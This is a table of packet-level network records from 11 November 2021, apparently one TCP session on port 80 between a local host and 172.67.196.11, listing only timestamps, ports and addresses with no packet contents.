Nov 11, 2021 20:35:49.102652073 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102658033 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102694035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102714062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102737904 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102761030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102777958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102807045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102827072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102827072 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102847099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102866888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102895975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102914095 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102936029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102963924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102986097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103003979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103032112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103053093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103054047 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.103072882 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103096962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103115082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103142977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103158951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103185892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103204012 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103230953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103236914 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.103245020 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.103250027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103271961 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103287935 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103315115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103332996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103358984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103375912 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103403091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103405952 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.103413105 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.103423119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103441954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.103467941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.104209900 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.106189966 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.106221914 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.120789051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120812893 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120867968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120898962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120919943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120950937 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120971918 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.120985985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.120996952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121006966 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121022940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121049881 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121069908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121084929 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121092081 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121098995 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121119022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121149063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121170044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121174097 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121177912 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121193886 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121213913 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121237040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121256113 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121268034 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121270895 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121285915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121308088 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121346951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121365070 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121371984 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121376038 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121388912 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121411085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121437073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121454954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121462107 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121469021 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121484995 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121503115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121529102 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121547937 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121550083 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121555090 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121573925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121592999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121622086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121639967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121644974 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121650934 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121665001 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121684074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121709108 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121726990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121736050 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121741056 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121757984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121776104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121800900 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121831894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121860027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121860981 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121865988 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121881008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121906042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121936083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121958017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.121968985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121973991 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.121989012 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122011900 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122039080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122057915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122064114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122070074 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122085094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122108936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122124910 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122137070 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122160912 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122179031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122209072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122227907 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122232914 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122252941 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122256041 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122272015 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122302055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122303009 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122319937 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122343063 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122349977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122376919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122390985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122402906 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122426033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122445107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122466087 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122472048 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122474909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122494936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122524023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122546911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122548103 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122553110 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122571945 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122591972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122622013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122642040 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122643948 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122647047 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122668982 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122692108 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122719049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122740984 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122750044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122765064 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122801065 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122802019 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122827053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122844934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122875929 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122885942 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.122895002 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122925997 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122946978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.122977972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123022079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123028040 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123035908 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123040915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123069048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123090982 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123115063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123137951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123156071 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123186111 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123203993 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123223066 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123251915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123270035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123276949 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123300076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123321056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123322010 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123330116 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123347998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123367071 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123397112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123405933 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123415947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123445988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123462915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123492956 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123493910 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123500109 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123512030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123538017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123564005 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123583078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123600960 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123615980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123635054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123666048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123684883 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123688936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123691082 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123713970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123739004 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123759985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123771906 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123778105 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123795033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123810053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123836994 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123836994 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123862982 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123882055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123907089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123925924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123955011 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.123963118 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123970032 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.123975039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124005079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124042988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124064922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124088049 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124090910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124094009 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124110937 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124136925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124155998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124161959 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124181986 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124191999 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124201059 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124233007 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124250889 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124255896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124269009 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124283075 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124306917 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124326944 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124356985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124376059 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124392033 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124398947 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124406099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124424934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124454975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124474049 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124479055 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124479055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124505043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124524117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124553919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124573946 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124576092 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124602079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124612093 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124619007 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124620914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124650002 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124670029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124702930 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124712944 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124728918 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124754906 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124775887 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124778032 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124794960 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124805927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124825001 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124840975 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124872923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124897003 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124927998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124947071 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124972105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124983072 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.124993086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.124994040 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125020027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125026941 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125041962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125062943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125083923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125108957 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125108957 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125113964 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125127077 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125157118 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125174999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125195980 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125204086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125222921 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125224113 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125252962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125272036 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125277042 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125298977 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125324965 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125339031 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125349998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125360966 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125381947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125405073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125435114 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125449896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125475883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125480890 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125488043 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125494957 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125519037 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125535011 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125561953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125579119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125591040 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125603914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125621080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125647068 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125650883 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125655890 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125663996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125686884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125703096 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125727892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125736952 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125742912 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125751972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125778913 CET	80	49751	172.67.196.11	192.168.2.3
